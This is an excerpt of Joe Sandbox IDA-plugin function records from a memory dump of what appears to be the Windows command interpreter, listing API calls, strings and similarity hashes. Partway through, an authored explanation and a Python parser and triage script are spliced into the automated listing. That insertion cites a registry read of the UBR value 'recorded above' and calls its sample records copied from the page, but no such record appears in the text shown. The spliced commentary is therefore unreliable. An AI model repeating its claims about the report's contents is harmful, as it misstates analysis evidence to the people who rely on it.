                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B58B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$_wcsicmp$AllocProcess
                                                                              • String ID: ELSE$IF/?
                                                                              • API String ID: 3223794493-1134991328
                                                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                              • Instruction ID: 805dfdac44b812689a46f7233370ab62b41bf04329da8c869ab6ef9956e55db2
                                                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                              • Instruction Fuzzy Hash: D0411A61E0D64382FA6CBF24E4522BDA7A5AF5C740F546435D62EC63B7EE7CE8018740
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                              • String ID:
                                                                              • API String ID: 1532185241-0
                                                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                              • Instruction ID: 46e79fc22fda5b4fe543c13028d68c17061399e45e339db3c9264f036416f716
                                                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                              • Instruction Fuzzy Hash: 6741C232A2875187E718BF21E44567DBAA1FB8CB40F445535EA2E837B6CF3CE8518B00
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 3588551418-0
                                                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                              • Instruction ID: d39b1d57da928baf51656663d7fef851e4d344ab0cfb426899dc0003fe67f1d0
                                                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                              • Instruction Fuzzy Hash: 84414971A1C646CBE618BF51E440679F661EB8CB91F145039D66E877B2CF2CE8408B40
                                                                              APIs
                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A77A
                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A7AF
                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A80E
                                                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A839
                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A850
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseErrorLastOpen
                                                                              • String ID:
                                                                              • API String ID: 2240656346-0
                                                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                              • Instruction ID: c56ba5a04a4eed255044eaaad6c7eb7d116824ef77cedfcf72d76245dd0c7439
                                                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                              • Instruction Fuzzy Hash: C0317A32A2CA82C2E754AF25E44056AF7A4FF8C790F545034EA9EC2776DF3CD8528B00
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5701B8: _get_osfhandle.MSVCRT ref: 00007FF64B5701C4
                                                                                • Part of subcall function 00007FF64B5701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF64B57E904,?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B5701D6
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B58D0F9
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D10F
                                                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D166
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B58D17A
                                                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D18C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 3008996577-0
                                                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                              • Instruction ID: ec01ec1265a9bb4c2a75e70d4fbbf97f3033e89f8aebcaea5c854f6c85c040b4
                                                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                              • Instruction Fuzzy Hash: 2F212B66B28651CAE704BF71E8000BDB7B0FB4DB54B449125DE1D93BA9EF38D045CB14
                                                                              APIs
                                                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58C9EE,?,?,?,00007FF64B58EA6C,?,?,?,00007FF64B58E925), ref: 00007FF64B575CCB
                                                                              • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FF64B58C9EE,?,?,?,00007FF64B58EA6C,?,?,?,00007FF64B58E925), ref: 00007FF64B575CDF
                                                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF64B575D03
                                                                              • fprintf.MSVCRT ref: 00007FF64B57F4A9
                                                                              • fflush.MSVCRT ref: 00007FF64B57F4C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                              • String ID:
                                                                              • API String ID: 1826527819-0
                                                                              • Opcode ID: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                                                                              • Instruction ID: 226fd09c7911195c2206f81107b4245b0a54c7435314c46d4f6b7df9fcc4e9cd
                                                                              • Opcode Fuzzy Hash: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                                                                              • Instruction Fuzzy Hash: 9C011B61A0C682CAE608BF25E4442B9FA61EB8EB55F449174E66F863B7CF7C90448B00
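The records above are raw Joe Sandbox IDA-plugin output, one per function recovered from the memory dump, and what a reviewer wants from a listing this long is not any single record but two derived facts: where each function's code lives (the .sdmp name encodes process, base address, page protection and memory type; every region on this page is PAGE_EXECUTE_READ inside a MEM_IMAGE mapping, i.e. image-backed code) and which records touch something sensitive, such as the read of UBR under Software\Microsoft\Windows NT\CurrentVersion through RegOpenKeyExW/RegQueryValueExW recorded above. The following is an added example, not Joe Sandbox's own code, that parses records in the shape shown on this page and triages them that way: it decodes the region as a winnt.h PAGE_*/MEM_* pair, flags functions whose code sits in executable non-image memory (the shape an unpacked or injected payload shows up in, which this page's dumps do not exhibit), and flags registry paths among the strings and registry-read API pairs. The .sdmp field layout, and the reading of its fifth and seventh fields as protection and memory type, are assumptions consistent with the values on this page rather than something the report documents; the sample input is constructed from two of this page's records plus one hypothetical third record.

```python
"""Parse and triage Joe Sandbox IDA-plugin function records (added example, not Joe
Sandbox code; the .sdmp field layout and the PAGE_*/MEM_* reading are assumptions)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}   # winnt.h values
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80

@dataclass
class DumpRegion:
    process: int
    base: int
    protection: int
    mem_type: int

    @classmethod
    def from_name(cls, name: str) -> DumpRegion:
        # ASSUMPTION: <proc>.<stage>.<dump id>.<base>.<protection>.<state>.<type>.<module>.sdmp
        p = name.removesuffix(".sdmp").split(".")
        if len(p) != 8:
            raise ValueError(f"unexpected .sdmp name: {name}")
        return cls(int(p[0]), int(p[3], 16), int(p[4], 16), int(p[6], 16))

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXEC_MASK)

    @property
    def image_backed(self) -> bool:          # executable and not image-backed = unpacked/injected code
        return self.mem_type == 0x1000000

    def describe(self) -> str:
        return f"proc {self.process} {self.base:#x} {PAGE.get(self.protection, hex(self.protection))} {MEM.get(self.mem_type, hex(self.mem_type))}"

@dataclass
class FunctionRecord:
    source: DumpRegion | None = None
    api_calls: list[str] = field(default_factory=list)   # listing order, subcalls included
    api_id: str = ""
    string_id: str = ""   # the report joins a function's strings with '$'
    opcode_id: str = ""   # the report's similarity key for the function: the field to pivot on

FIELD_ATTR = {"API ID": "api_id", "String ID": "string_id", "Opcode ID": "opcode_id"}
FIELD_RE = re.compile(r"^•\s*(Source File|API ID|String ID|Opcode ID):\s*(.*)$")
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally after "Part of subcall function X:"
CALL_RE = re.compile(r"^•\s*(?:Part of subcall function \w+:\s*)?(\w+)\.[\w.-]+?(?:\(.*\))?,?\s*ref:\s*[0-9A-F]+$")
REGISTRY_RE = re.compile(r"(?i)^(Software|SYSTEM)\\")

def parse_records(text: str) -> list[FunctionRecord]:
    records, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":                       # each record opens with its APIs header
            current = FunctionRecord()
            records.append(current)
        elif current is None or not line:
            continue
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1), m.group(2).strip()
            if key == "Source File":             # "<name>.sdmp, Offset: ..., based on PE: ..."
                current.source = DumpRegion.from_name(value.split(",")[0])
            else:
                setattr(current, FIELD_ATTR[key], value)
        elif (m := CALL_RE.match(line)):
            current.api_calls.append(m.group(1))
    return records

def triage(records: list[FunctionRecord]) -> list[tuple[int, str]]:
    """The checks worth running over hundreds of records before reading any one of them."""
    findings = []
    for i, r in enumerate(records):
        if r.source and r.source.executable and not r.source.image_backed:
            findings.append((i, "code in non-image memory: " + r.source.describe()))
        if any(REGISTRY_RE.match(s) for s in r.string_id.split("$")):
            findings.append((i, "registry path: " + r.string_id))
        if {"RegOpenKeyExW", "RegQueryValueExW"} <= set(r.api_calls):
            findings.append((i, "registry read: " + ", ".join(dict.fromkeys(r.api_calls))))
    return findings

# Constructed sample: two records copied from this page plus a hypothetical third whose
# code sits in an executable MEM_PRIVATE region, the shape an unpacked payload shows up in.
SAMPLE = r"""
APIs
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• API ID: CloseOpenQueryValue
• String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
• Opcode ID: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A77A
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A7AF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A850
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• API ID: QueryValue$CloseErrorLastOpen
• Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
APIs
  • Part of subcall function 000001E2A3C41000: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,000001E2A3C41230), ref: 000001E2A3C41016
• _wcsicmp.MSVCRT ref: 000001E2A3C41200
• Source File: 00000008.00000002.1265099999.000001E2A3C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E2A3C40000, based on PE: false
"""
```

`triage(parse_records(SAMPLE))` reports the registry path on the first record and the RegOpenKeyExW/RegQueryValueExW pair on the second, both of which come straight from this page; only the constructed third record trips the non-image-memory check, because every dump region on this page is PAGE_EXECUTE_READ inside a MEM_IMAGE mapping. Feeding the whole report's function listing through the same parser is how to confirm that claim for all of it rather than for the handful of records shown here.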
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateSemaphore
                                                                              • String ID: _p0$wil
                                                                              • API String ID: 1078844751-1814513734
                                                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                              • Instruction ID: 1774e644ea6e8fe7090d07278b46bc2fa6c3e0fa01041f9f2d68f27cd038ed41
                                                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                              • Instruction Fuzzy Hash: 60511761B2D74286EE6ABF14E4543B9E290EF8CB90F644431DA2D877A2DF3CE415C740
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DiskFreeSpace
                                                                              • String ID: %5lu
                                                                              • API String ID: 2448137811-2100233843
                                                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                              • Instruction ID: f8b0b00f9624a0b7d0d8c9be8f897c02b33b8f4ecb48f271a27c8c8900604ab5
                                                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                              • Instruction Fuzzy Hash: 2141906270DAC185EB69FF51E8406EAB361FB88788F408035DA5D8B76ADF7CD649C700
                                                                              APIs
                                                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF64B58B934
                                                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF64B575085), ref: 00007FF64B58B9A5
                                                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF64B575085), ref: 00007FF64B58B9F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                              • String ID: %WINDOWS_COPYRIGHT%
                                                                              • API String ID: 1103618819-1745581171
                                                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                              • Instruction ID: 77eec70ccc0d90e4c03f9b10699a33b6990f4e04fa2f20660088cad52afe0b41
                                                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                              • Instruction Fuzzy Hash: 8741B262A1C786C2EB14BF11D410279B3A4FB4CB90F858231DAAD833A6EF3DE495C740
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_wcslwr
                                                                              • String ID: [%s]
                                                                              • API String ID: 886762496-302437576
                                                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                              • Instruction ID: 7cb0272f08fe8dce706243d83822ad74a5779816f697b1da8a23165d38ff4deb
                                                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                              • Instruction Fuzzy Hash: 6A316A72709B8285EB65EF21D8503E9A7A0FB8CB88F444135DA6D87766DF3CD6458700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: iswspace
                                                                              • String ID: off
                                                                              • API String ID: 2389812497-733764931
                                                                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                              • Instruction ID: 303d6325778763bf016db9159da6fee1d5bc4cc7c52bd8f83fe1565d2d1b246a
                                                                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                              • Instruction Fuzzy Hash: AE215C61F0C642C6FA78BF15D451279E6A1EF4DBA0F48C035D96EC76A6DEACE842C301
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                                                              • String ID: %s=%s$DPATH$PATH
                                                                              • API String ID: 3731854180-3148396303
                                                                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                              • Instruction ID: 269661b5d8684a2fa1799a231819e27a837009b8c7e4bdf3d720756be804cb5b
                                                                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                              • Instruction Fuzzy Hash: 40218B61B1D646C1EA6CBF59E4402B9B6A1AF8CB80F889135C92EC33B6DE6CE4508340
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcscmp
                                                                              • String ID: *.*$????????.???
                                                                              • API String ID: 3392835482-3870530610
                                                                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                              • Instruction ID: 1e4849d77ab6029bb458a40ceb3732025ae396cf5ffbac3d8e9346f06bbba59d
                                                                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                              • Instruction Fuzzy Hash: 88115625B2CA5281E768BF17E440539B2A1EB4CB81F199031DE5D87B66DE7DE4428700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: CMD Internal Error %s$%s$Null environment
                                                                              • API String ID: 383729395-2781220306
                                                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
